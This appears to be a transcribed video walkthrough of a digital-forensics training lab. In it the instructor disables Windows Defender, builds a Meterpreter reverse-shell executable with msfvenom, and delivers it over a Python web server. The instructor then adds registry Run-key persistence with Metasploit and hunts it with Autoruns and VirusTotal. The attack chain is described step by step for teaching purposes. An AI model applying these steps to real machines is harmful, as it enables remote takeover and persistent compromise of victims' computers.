All right, let's take a look at lab number 3, DFIR 11, persistence hunting. Lab objective is to learn how to perform malware persistence and hunt for its process. Lab mission is to create a Metrepreter malware using Metasploit framework and hunt for its persistence capabilities. Requirements are basic working knowledge of searching for information on the internet, basic working knowledge of Metasploit, and basic working knowledge of forensics. You're going to need your Kali, Linux, and your Windows 10 machines, and your textbooks will be Chapter 11, Threat Hunting, Section 3, Malware Forensics. So the first thing they want you to do is to make sure that you have your Kali machines and your Windows machines being able to talk to each other. So you want to make sure that they are both on the network setting, the NAT network setting. And let me go ahead and show you what that looks like. So basically, I've got my Kali on NAT network, and your Windows machine should be the same thing. Let me see if I can find, yep, Windows 10 update running, NAT network. So make sure that is set up so that you can talk to the machines. All right, once you have that, let's go ahead and go to your Windows machine and let's verify that this stuff is set up. So we're going to go ahead and go to network and sharing. We'll do it like this. We'll go to network status and we'll go to network and sharing center. And then we'll go to change adapter settings. We want to right click on our Ethernet and we want to look at our properties. Then we want to double click on IPv4 and we want to obtain an IP address automatically and also obtain DNS automatically. I'm going to say OK. And let's take a look at our status here. Let's see status here and details. So I got my IP address of 10.0.2.1 here. All right. All right, good. All right. And let's say close and close. All right, let's go ahead and take a look at our Kali machine here. And let's go to our terminal. And we're going to type in IPADDR or whoops, IPADDR. See what we got here. So we've got an IP address of 10.0.2.15. Let's see if my ifconfig is installed. Yep, there we go, 10.0.2.15 here. So let's go ahead and see what we have. Let's see if we can ping our two machines here. So let's try this. Let's try to ping Kali. So 10.0.2.15. All right, that's good. We can ping our Kali machine. Let's do the same thing from Kali to Windows. Let's do ping 10.0.2.6. Okay, so we have network connectivity between the two machines. We can go ahead and continue. So on the Windows side, they want us to disable Windows Defender. So we're going to go to the local group policy on our machine here. So we're going to type a gp edit. You can see that starts to populate here. And again, we want to, this is the local group policy. If you were on a domain, you would do that for domain group policy. But just know that with group policy, domain group policy always overrides local group policy. And if you were to change the settings on your local machines, those would be overwritten next time you restarted your computer. All right, so let's go to computer configuration and then admin templates and then Windows components and then Windows Defender. Here we go. Let's see, Microsoft Windows Defender. See if we can find it here. They move stuff around in different versions of Windows, and I'm looking for Microsoft Defender. There we go, antivirus. All right, so now that I'm here, I want to look for real-time protection. And let's see, they want me to disable certain sections here. So let's take a look. What is set up here? So real-time protection, let's see, turn off real-time protection. And we're going to make it say enabled. Applied to make it go into effect right now. Okay, next one, behavior monitoring. We're going to set this one to disabled. I'm going to click on apply and OK. Next one is scan all downloadable files and attachments. I'm going to set this one to disabled. I'm going to apply. Okay. And the last one I want to do is turn on process scanning whenever real-time protection is enabled, and I'm going to choose disabled. So your machines should now match my settings. So enabled, disabled, disabled, and then turn off process, disabled. Okay, next I want to close this out here, and I want to open up my command prompt, and I'm going to type GP update. There we go. Okay, group policy has updated successfully. Let's go ahead and close this window here. So my settings have taken effect. So now what we want to do is we want to create a reverse shell on our Kali machine. So that's what we're going to do. We're going to make a reverse shell with our local host with Kali. So let's go ahead and do that. So I'm going to type msf venom -p windows meter. Make sure you got your spelling right. meter / reverse TCP localhost is, I think mine's gonna be Ethernet 0. Yep, ETH 0 here. Equals Ethernet 0 here. Set up my listening port to be 4444. And I'm gonna create this as an executable with the output called malware.exe. Just checking my syntax here, msf venom -p windows / meterpreter reverse TCP localhost Ethernet 0 port. Okay, that looks good. Go ahead and press enter here. All right, so let's see, I got a little error here. Let's take a look, see if I can't fix this. All right, as usual, the problem is with my syntax. I forgot to add an equal sign here. Try this again. There we go. So my malware has been created. This is my TCP malware with the Metrepreter payload. So next, what they want me to do is to start a reverse TCP handler that matches the payload with the MSF console. So that's what we're going to go ahead and do here. So I am going to go ahead and get into my Metasploit console. So type MSF console. All right, so Metasploit is starting and we get a nice little graphic I love shell. So each time you load this, this is a random. So pretty cool there. Let's go ahead and now we're going to use the exploit and get this process started. So you've got your console here. Let's go ahead and you say use exploit slash multi slash handler. All right. And now that we're here, we want to set our payload and get this thing kicked off here. So let's do set payload windows slash meterpreter slash reverse TCP. And I'm just checking my syntax as I go here. Set payload windows meterpreter TCP. Okay. All right, our payload is loaded up here. Now we're going to set up my listening host to be on my Ethernet 0. So let's go ahead and do that. So I'm going to say set lhost Ethernet 0. All right, localhost is set to my LAN. Next, I want to kick off the exploit. So let's go ahead and type exploit. All right, so my reverse TCP handler has started. So now I want to transfer the malware over to my Windows machine with simple HTTP server. So let's go ahead and do that. I'm going to make a new tab here. And we're going to run Python -m simple HTTP server. I'm basically making a web server on my Kali machine here. All right, so my server has started here. All right, so now on my Windows machine, I want to open up Microsoft Edge here. All right, and I want to browse to my Kali machine's IP address. So I want to go to 10, let's do, 10.0.2.15. Let's try this. Make sure my connection is still up. Okay, yep, it is still up. Let's do HTTP, whack, whack. Oh, what? I might need my port 8000. There we go. So port 8000 is up and running. Let's see what we got. All right, so as you can see, I just had to reload the page. I did get my reverse shell here. So let's go ahead and look for the malware executable, which we see right here. We're going to click on malware. Hopefully it's going to let us download it. Let's see if I'm being blocked by Microsoft Edge here. Not, I will click on it again. Let's go to downloads. Nothing there. Let's try this again. Malware. Here we go. Here we go. So malware isn't coming download. Make sure you trust it before you open it. Yeah, they're definitely trying to thwart our efforts here. We want to keep this file. And it says, "Are you sure?" Right? And we're gonna say yes. Keep anyway. We know what we're doing here. Oh, virus detected. Let's try this again. Uh, SA keep report this file as safe. Whoops, I don't want to do that. Let's go back. Try this again here. Say yes, keep, more, keep. All right, well, let's go ahead and see if we can't turn on some other control here to get this file safe. All right, so I finally got the file on here. What I had to do was open up Windows Defender and actually turn off real-time protection. So that's what I did. I went to Windows Defender, Windows Security, Manage Settings, and I turned off real-time protection. So we should be able to continue with the lab here. I even tried to get Chrome on here, but the same thing would not let me get that file. Okay, so now that we have our file on here, we should be able to continue. So let me go ahead and pull up my lab. Okay, so now that we have file here, let's go ahead and get the malware. And we're going to go ahead and run anyway. All right, so let's go ahead and take a look. Here we've ran the malware, and we're going to take a look here and see what we have. I'm going to say open. And let's see what we got going on in Cali here. All right, so I was able to run the malware, and you can see the malware is running. Process ID 8688 here. Once I did that, you can see right here the actual Metrepreter session has opened. So now what we can do is try to get persistence on Windows. So let's go ahead and send the background task to our machine with the background command here. All right, so we're going to background here, get the persistence mechanism started. All right, so we can see next we will want to use post exploit. So let's do this, use post / Windows / manage / persistence executable. Okay, looks good there. All right, now you want to use the sessions command. So, okay, which session would you like to maintain persistence on? Well, we know that is my Windows box here, so we're going to say set session 1. So let's go ahead and do that. So we're going to say set remote execution path to all right, so set remote execution path. Let's do our desktop / malware executable here. All right. Now we want to set session number 1, the active session here. Then we want to type run. Oh, let me take a look at my syntax here. Let's see, set remote REXE path to desktop slash malware. Mhm. All right. So once you click on run, as you can see right here, it runs the module against my desktop. And I had a message error before because my malware needed to be on my desktop. Once I moved the malware on my desktop, I was able to run, and the persistence mechanism has actually been run here. And what it did was it installed an auto run into my actual registry, HKey, um, current user, software, Microsoft Windows run. So that was a success here. So what they want us to do now is to go ahead and reboot the Windows machine. So and make sure that your Windows Defender is turned off. So we're going to go ahead and click on the Windows machine. We're going to click on power, and we're going to restart. Then once it's restarting, we're going to make sure that our Windows Defender is turned off. So we're going to check that right after Windows restarts here. All right. So let's go to Defender. Take a look right here, and we're going to say it looks like virus and threat protection setting is turned on. Let's see what we got here. So off, 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 off. Okay, that looks good. All right. So next, let's go ahead and take a look at our task manager. And let's see if we can't look at the processes that are currently running on our machine and look for anything that is suspicious here. Let's see. Everything looks normal. Windows 10 stuff. Registry. Yeah, I don't see anything that looks suspicious. So let's go ahead and use the auto runs program to look for stuff that is persistent here. So let's do auto runs 64. Let's go ahead and load this up here. And let's take a look. See if we can see anything here. We're looking for stuff that is suspicious here. And let's see what we see. We're looking for active services on Windows here. And I'm looking for stuff that just does not look right. All right, so as we can see right here, we do see our current entry right here. If you look at the left right here, we had our HKey current user software Windows, and we're seeing our actual malware written in this funky looking name right here. That's our service here. And so we do see we have very, very suspicious service here, and we can see that it's actually located in my home folder, users Ian Trimble app data, local temp default. So we know where the file is. So let's go ahead and see if we can't investigate this here. So we want to check this in VirusTotal. So let's see. I think we have to enable that here. Let me see. Let's try. Let's try this. Yeah, submit to VirusTotal. All right, so what we want to do is submit this file to VirusTotal. So I'm going to go and look at the location of it. That was in users in app data. So let's do this. Let's go to File Explorer here, and let's go to Ian Trimble. Let's go to app data. All right, and let's see. It was local, and then temp default. Temp default. Default.exe. Okay. So let's sort by name here. And there we go, default. So this is the malware. Let's go ahead and choose this file. And we're going to go to the same location. So let's do c:/users intr/app data local. And then we want to do temp. And we're going to choose our default. Open. And you can see right here, yes, this is in fact malware. So that was the lab number 3. Pretty cool lab. Like I said, we set up an actual reverse shell, got the user to click on the file, the malware file, and it was able to survive a reboot. And you can see that it was, yeah, still part of the auto runs file, which basically shows files that are loaded automatically when Windows starts. So that is the end of the lab. Hope you learned a lot, and I will see you on the next one. All right, yeah, go ahead and clean up this machine, turn on your Windows Defender, and get back in working order. All right, talk soon.